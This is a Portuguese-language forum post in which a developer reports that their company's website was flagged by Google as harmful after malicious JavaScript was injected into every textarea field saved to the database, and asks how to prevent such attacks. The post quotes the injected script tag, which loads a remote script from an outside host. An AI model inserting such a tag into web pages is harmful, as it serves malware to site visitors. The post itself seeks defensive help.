Usamos cookies para medir audiência e melhorar sua experiência. Você pode aceitar ou recusar a qualquer momento. Veja sobre o iMasters.
Caros colaboradores;
Essa semana me deparei com um certo problema.
Fiz uma pesquisa no GOOGLE, para acessar um site desenvolvido pela empresa em que trabalho. E tinha a mensagem: "Este site pode danificar seu computador." e nao deixava eu entrar no site.
Tentei entrar no site e nao consegui. Lendo alguns artigos, identifiquei que existe um MALWARE no site.
Esse MALWARE foi introduzido em todos os campos TEXTAREA, e tem alguns com o componente "WYSIWYG" que podemos organizar o texto e quando salvamos ele salva as TAGS HTML no banco.
Identifiquei que tinha essse codigo JS em todos os texArea do meu site. <script src=http://www.4vrs.ru/ngg.js></script>.
Já retirei esse codigo.
Mas o que tenho que fazer para evitar esse tipo de ataque??
alguem ja passou por isso?
Carregando comentários...
